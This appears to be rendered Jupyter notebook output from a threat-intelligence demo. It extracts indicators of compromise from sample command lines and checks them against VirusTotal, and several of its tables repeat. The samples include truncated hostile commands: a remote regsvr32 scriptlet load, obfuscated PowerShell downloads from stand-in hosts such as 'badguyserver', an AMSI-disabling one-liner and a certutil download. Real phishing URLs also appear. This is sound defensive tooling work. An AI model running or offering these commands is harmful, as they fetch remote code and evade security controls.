\n", " | Observable | \n", "IoCType | \n", "Status | \n", "ResponseCode | \n", "RawResponse | \n", "Resource | \n", "SourceIndex | \n", "VerboseMsg | \n", "Resource | \n", "ScanId | \n", "Permalink | \n", "Positives | \n", "MD5 | \n", "SHA1 | \n", "SHA256 | \n", "ResolvedDomains | \n", "ResolvedIPs | \n", "DetectedUrls | \n", "
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
0 | \n", "90.156.201.97 | \n", "ipv4 | \n", "Success | \n", "1 | \n", "{\"asn\": \"25532\", \"undetected_downloaded_sample... | \n", "NaN | \n", "0 | \n", "IP address in dataset | \n", "NaN | \n", "NaN | \n", "NaN | \n", "350 | \n", "NaN | \n", "NaN | \n", "NaN | \n", "0-1000v.ru, 00004.ru, 01sasha.ru, 027.ru, 03ma... | \n", "NaN | \n", "http://remont-iphone-spb.com/, http://www.prov... | \n", "
\n", " | Observable | \n", "IoCType | \n", "Status | \n", "ResponseCode | \n", "RawResponse | \n", "Resource | \n", "SourceIndex | \n", "VerboseMsg | \n", "Resource | \n", "ScanId | \n", "Permalink | \n", "Positives | \n", "MD5 | \n", "SHA1 | \n", "SHA256 | \n", "ResolvedDomains | \n", "ResolvedIPs | \n", "DetectedUrls | \n", "
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
0 | \n", "90.156.201.97 | \n", "ipv4 | \n", "Success | \n", "1 | \n", "{\"asn\": \"25532\", \"undetected_downloaded_sample... | \n", "NaN | \n", "0 | \n", "IP address in dataset | \n", "NaN | \n", "NaN | \n", "NaN | \n", "350 | \n", "NaN | \n", "NaN | \n", "NaN | \n", "0-1000v.ru, 00004.ru, 01sasha.ru, 027.ru, 03ma... | \n", "NaN | \n", "http://remont-iphone-spb.com/, http://www.prov... | \n", "
1 | \n", "7657fcb7d772448a6d8504e4b20168b8 | \n", "md5_hash | \n", "Success | \n", "1 | \n", "{\"scans\": {\"Bkav\": {\"detected\": true, \"version... | \n", "7657fcb7d772448a6d8504e4b20168b8 | \n", "0 | \n", "Scan finished, information embedded | \n", "7657fcb7d772448a6d8504e4b20168b8 | \n", "54bc950d46a0d1aa72048a17c8275743209e6c17bdacfc... | \n", "https://www.virustotal.com/file/54bc950d46a0d1... | \n", "59 | \n", "7657fcb7d772448a6d8504e4b20168b8 | \n", "84c7201f7e59cb416280fd69a2e7f2e349ec8242 | \n", "54bc950d46a0d1aa72048a17c8275743209e6c17bdacfc... | \n", "NaN | \n", "NaN | \n", "NaN | \n", "
\n", " | Observable | \n", "IoCType | \n", "Status | \n", "ResponseCode | \n", "RawResponse | \n", "Resource | \n", "SourceIndex | \n", "VerboseMsg | \n", "Resource | \n", "ScanId | \n", "Permalink | \n", "Positives | \n", "MD5 | \n", "SHA1 | \n", "SHA256 | \n", "ResolvedDomains | \n", "ResolvedIPs | \n", "DetectedUrls | \n", "
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
0 | \n", "90.156.201.97 | \n", "ipv4 | \n", "Success | \n", "1 | \n", "{\"asn\": \"25532\", \"undetected_downloaded_sample... | \n", "NaN | \n", "0 | \n", "IP address in dataset | \n", "NaN | \n", "NaN | \n", "NaN | \n", "350 | \n", "NaN | \n", "NaN | \n", "NaN | \n", "0-1000v.ru, 00004.ru, 01sasha.ru, 027.ru, 03ma... | \n", "NaN | \n", "http://remont-iphone-spb.com/, http://www.prov... | \n", "
1 | \n", "7657fcb7d772448a6d8504e4b20168b8 | \n", "md5_hash | \n", "Success | \n", "1 | \n", "{\"scans\": {\"Bkav\": {\"detected\": true, \"version... | \n", "7657fcb7d772448a6d8504e4b20168b8 | \n", "0 | \n", "Scan finished, information embedded | \n", "7657fcb7d772448a6d8504e4b20168b8 | \n", "54bc950d46a0d1aa72048a17c8275743209e6c17bdacfc... | \n", "https://www.virustotal.com/file/54bc950d46a0d1... | \n", "59 | \n", "7657fcb7d772448a6d8504e4b20168b8 | \n", "84c7201f7e59cb416280fd69a2e7f2e349ec8242 | \n", "54bc950d46a0d1aa72048a17c8275743209e6c17bdacfc... | \n", "NaN | \n", "NaN | \n", "NaN | \n", "
2 | \n", "http://club-fox.ru/img/www.loginalibaba.com/al... | \n", "url | \n", "Success | \n", "1 | \n", "{\"scan_id\": \"700994c09c45224fd5d6cb938e043ce64... | \n", "http://club-fox.ru/img/www.loginalibaba.com/al... | \n", "0 | \n", "Scan finished, scan information embedded in th... | \n", "http://club-fox.ru/img/www.loginalibaba.com/al... | \n", "700994c09c45224fd5d6cb938e043ce648baa2231401e7... | \n", "https://www.virustotal.com/url/700994c09c45224... | \n", "12 | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "
\n", " | 0 | \n", "
---|---|
Observable | \n", "90.156.201.97 | \n", "
IoCType | \n", "ipv4 | \n", "
Status | \n", "Success | \n", "
ResponseCode | \n", "1 | \n", "
RawResponse | \n", "{\"undetected_downloaded_samples\": [{\"date\": \"2... | \n", "
Resource | \n", "NaN | \n", "
SourceIndex | \n", "0 | \n", "
VerboseMsg | \n", "IP address in dataset | \n", "
Resource | \n", "NaN | \n", "
ScanId | \n", "NaN | \n", "
Permalink | \n", "NaN | \n", "
Positives | \n", "350 | \n", "
MD5 | \n", "NaN | \n", "
SHA1 | \n", "NaN | \n", "
SHA256 | \n", "NaN | \n", "
ResolvedDomains | \n", "0-1000v.ru, 00004.ru, 01sasha.ru, 027.ru, 03ma... | \n", "
ResolvedIPs | \n", "NaN | \n", "
DetectedUrls | \n", "http://remont-iphone-spb.com/, http://www.prov... | \n", "
\n", " | CommandLine | \n", "
---|---|
0 | \n", ".\\ftp -s:C:\\RECYCLER\\xxppyy.exe | \n", "
1 | \n", ".\\reg not /domain:everything that /sid:shines is /krbtgt:golden ! | \n", "
2 | \n", "cmd /c \"systeminfo && systeminfo\" | \n", "
3 | \n", ".\\rundll32 /C 42424.exe | \n", "
4 | \n", ".\\rundll32 /C c:\\users\\MSTICAdmin\\42424.exe | \n", "
\n", " | IoCType | \n", "Observable | \n", "SourceIndex | \n", "Input | \n", "
---|---|---|---|---|
0 | \n", "dns | \n", "microsoft.com | \n", "24 | \n", "cmd /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microsoft.com; marcook@microsoft... | \n", "
1 | \n", "url | \n", "http://server/file.sct | \n", "31 | \n", ".\\regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll | \n", "
2 | \n", "dns | \n", "server | \n", "31 | \n", ".\\regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll | \n", "
3 | \n", "dns | \n", "evil.ps | \n", "35 | \n", ".\\powershell.exe -c \"$a = 'Download'+'String'+\"(('ht'+'tp://paste'+ 'bin/'+'raw/'+'pqCwEm17'))\"... | \n", "
4 | \n", "url | \n", "http://somedomain/best-kitten-names-1.jpg' | \n", "37 | \n", "cmd /c \".\\pOWErS^H^ElL^.eX^e^ -^ExEc^Ut^IoNpOliCy BYpa^sS i^mPOr^T-^M^oDuLE biTsTr^ANSFe^R;^S^t... | \n", "
5 | \n", "dns | \n", "somedomain | \n", "37 | \n", "cmd /c \".\\pOWErS^H^ElL^.eX^e^ -^ExEc^Ut^IoNpOliCy BYpa^sS i^mPOr^T-^M^oDuLE biTsTr^ANSFe^R;^S^t... | \n", "
6 | \n", "dns | \n", "blah.ps | \n", "40 | \n", "cmd /c \"echo # aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa >> blah.ps1\" | \n", "
7 | \n", "md5_hash | \n", "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa | \n", "40 | \n", "cmd /c \"echo # aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa >> blah.ps1\" | \n", "
8 | \n", "dns | \n", "blah.ps | \n", "41 | \n", "cmd /c \"echo # aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa >> blah.ps1\" | \n", "
9 | \n", "md5_hash | \n", "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa | \n", "41 | \n", "cmd /c \"echo # aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa >> blah.ps1\" | \n", "
10 | \n", "md5_hash | \n", "81ed03caf6901e444c72ac67d192fb9c | \n", "44 | \n", "implant.exe 81ed03caf6901e444c72ac67d192fb9c | \n", "
11 | \n", "url | \n", "http://badguyserver/pwnme | \n", "46 | \n", "cmd /c \"echo Invoke-Expression Get-Process; Invoke-WebRequest -Uri http://badguyserver/pwnme\" | \n", "
12 | \n", "dns | \n", "badguyserver | \n", "46 | \n", "cmd /c \"echo Invoke-Expression Get-Process; Invoke-WebRequest -Uri http://badguyserver/pwnme\" | \n", "
13 | \n", "url | \n", "http://badguyserver/pwnme | \n", "47 | \n", ".\\powershell -Noninteractive -Noprofile -Command \"Invoke-Expression Get-Process; Invoke-WebRequ... | \n", "
14 | \n", "dns | \n", "badguyserver | \n", "47 | \n", ".\\powershell -Noninteractive -Noprofile -Command \"Invoke-Expression Get-Process; Invoke-WebRequ... | \n", "
15 | \n", "dns | \n", "Invoke-Shellcode.ps | \n", "48 | \n", ".\\powershell Invoke-Shellcode.ps1 | \n", "
16 | \n", "dns | \n", "Invoke-ReverseDnsLookup.ps | \n", "49 | \n", ".\\powershell Invoke-ReverseDnsLookup.ps1 | \n", "
17 | \n", "dns | \n", "Wscript.Shell | \n", "67 | \n", "cmd /c C:\\Windows\\System32\\mshta.exe vbscript:CreateObject(\"Wscript.Shell\").Run(\".\\powershell.e... | \n", "
18 | \n", "url | \n", "http://system.management.automation.amsiutils').getfield('amsiinitfailed','nonpublic,static').se... | \n", "77 | \n", ".\\powershell.exe -command [ref].assembly.gettype('http://system.management.automation.amsiutil... | \n", "
19 | \n", "dns | \n", "system.management.automation.amsiutils').getfield('amsiinitfailed','nonpublic,static').setvalue(... | \n", "77 | \n", ".\\powershell.exe -command [ref].assembly.gettype('http://system.management.automation.amsiutil... | \n", "
20 | \n", "ipv4 | \n", "1.2.3.4 | \n", "78 | \n", "netsh start capture=yes IPv4.Address=1.2.3.4 tracefile=C:\\\\Users\\\\user\\\\AppData\\\\Local\\\\Temp\\\\b... | \n", "
21 | \n", "dns | \n", "wscript.shell | \n", "81 | \n", "cmd /c \"powershell wscript.shell used to download a .gif\" | \n", "
22 | \n", "dns | \n", "abc.com | \n", "90 | \n", "c:\\Diagnostics\\UserTmp\\ransomware.exe @ abc.com abc.wallet | \n", "
23 | \n", "ipv4 | \n", "127.0.0.1 | \n", "102 | \n", "certutil -urlcache -split -f http://127.0.0.1/ | \n", "
24 | \n", "url | \n", "http://127.0.0.1/ | \n", "102 | \n", "certutil -urlcache -split -f http://127.0.0.1/ | \n", "
\n", " | Observable | \n", "IoCType | \n", "Status | \n", "ResponseCode | \n", "RawResponse | \n", "Resource | \n", "SourceIndex | \n", "VerboseMsg | \n", "Resource | \n", "ScanId | \n", "Permalink | \n", "Positives | \n", "MD5 | \n", "SHA1 | \n", "SHA256 | \n", "ResolvedDomains | \n", "ResolvedIPs | \n", "DetectedUrls | \n", "
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
0 | \n", "1.2.3.4 | \n", "ipv4 | \n", "Success | \n", "1 | \n", "{\"asn\": \"15169\", \"undetected_referrer_samples\"... | \n", "NaN | \n", "78 | \n", "IP address in dataset | \n", "NaN | \n", "NaN | \n", "NaN | \n", "162 | \n", "NaN | \n", "NaN | \n", "NaN | \n", "%2a.netaccess-india.com, 0-9.dgjtest030-pp-qm-... | \n", "NaN | \n", "http://1.2.3.4:8347/, http://1.2.3.4/, http://... | \n", "
1 | \n", "127.0.0.1 | \n", "ipv4 | \n", "IP is private address | \n", "NaN | \n", "NaN | \n", "NaN | \n", "102 | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "
2 | \n", "tsetup.1.exe | \n", "dns | \n", "Domain not resolvable | \n", "NaN | \n", "NaN | \n", "NaN | \n", "9 | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "
3 | \n", "tsetup.1.0.14.exe | \n", "dns | \n", "Domain not resolvable | \n", "NaN | \n", "NaN | \n", "NaN | \n", "9 | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "
4 | \n", "tsetup.1.0.14.tmp | \n", "dns | \n", "Domain not resolvable | \n", "NaN | \n", "NaN | \n", "NaN | \n", "9 | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "
5 | \n", "doubleextension.pdf.exe | \n", "dns | \n", "Domain not resolvable | \n", "NaN | \n", "NaN | \n", "NaN | \n", "20 | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "
6 | \n", "server | \n", "dns | \n", "Observable does not match expected pattern for... | \n", "NaN | \n", "NaN | \n", "NaN | \n", "31 | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "
7 | \n", "somedomain | \n", "dns | \n", "Observable does not match expected pattern for... | \n", "NaN | \n", "NaN | \n", "NaN | \n", "37 | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "
8 | \n", "badguyserver | \n", "dns | \n", "Observable does not match expected pattern for... | \n", "NaN | \n", "NaN | \n", "NaN | \n", "46 | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "
9 | \n", "badguyserver | \n", "dns | \n", "Observable does not match expected pattern for... | \n", "NaN | \n", "NaN | \n", "NaN | \n", "47 | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "
10 | \n", "system.management.automation.amsiutils').getfi... | \n", "dns | \n", "Observable does not match expected pattern for... | \n", "NaN | \n", "NaN | \n", "NaN | \n", "77 | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "
11 | \n", "system.management.automation.amsiutils | \n", "dns | \n", "Domain not resolvable | \n", "NaN | \n", "NaN | \n", "NaN | \n", "77 | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "
12 | \n", "http://server/file.sct | \n", "url | \n", "Host is unqualified domain name | \n", "NaN | \n", "NaN | \n", "NaN | \n", "31 | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "
13 | \n", "http://somedomain/best-kitten-names-1.jpg' | \n", "url | \n", "Host is unqualified domain name | \n", "NaN | \n", "NaN | \n", "NaN | \n", "37 | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "
14 | \n", "http://badguyserver/pwnme\" | \n", "url | \n", "Host is unqualified domain name | \n", "NaN | \n", "NaN | \n", "NaN | \n", "46 | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "
15 | \n", "http://badguyserver/pwnme\" | \n", "url | \n", "Host is unqualified domain name | \n", "NaN | \n", "NaN | \n", "NaN | \n", "47 | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "
16 | \n", "http://system.management.automation.amsiutils'... | \n", "url | \n", "Success | \n", "0 | \n", "{\"response_code\": 0, \"resource\": \"http://syste... | \n", "http://system.management.automation.amsiutils'... | \n", "77 | \n", "Resource does not exist in the dataset | \n", "http://system.management.automation.amsiutils'... | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "
17 | \n", "http://127.0.0.1/ | \n", "url | \n", "Host part of URL is a private IP address | \n", "NaN | \n", "NaN | \n", "NaN | \n", "102 | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "
18 | \n", "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa | \n", "md5_hash | \n", "String has too low an entropy to be a hash | \n", "NaN | \n", "NaN | \n", "NaN | \n", "40 | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "
19 | \n", "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa | \n", "md5_hash | \n", "String has too low an entropy to be a hash | \n", "NaN | \n", "NaN | \n", "NaN | \n", "41 | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "
20 | \n", "81ed03caf6901e444c72ac67d192fb9c | \n", "md5_hash | \n", "Success | \n", "0 | \n", "{\"response_code\": 0, \"resource\": \"81ed03caf690... | \n", "81ed03caf6901e444c72ac67d192fb9c | \n", "44 | \n", "The requested resource is not among the finish... | \n", "81ed03caf6901e444c72ac67d192fb9c | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "NaN | \n", "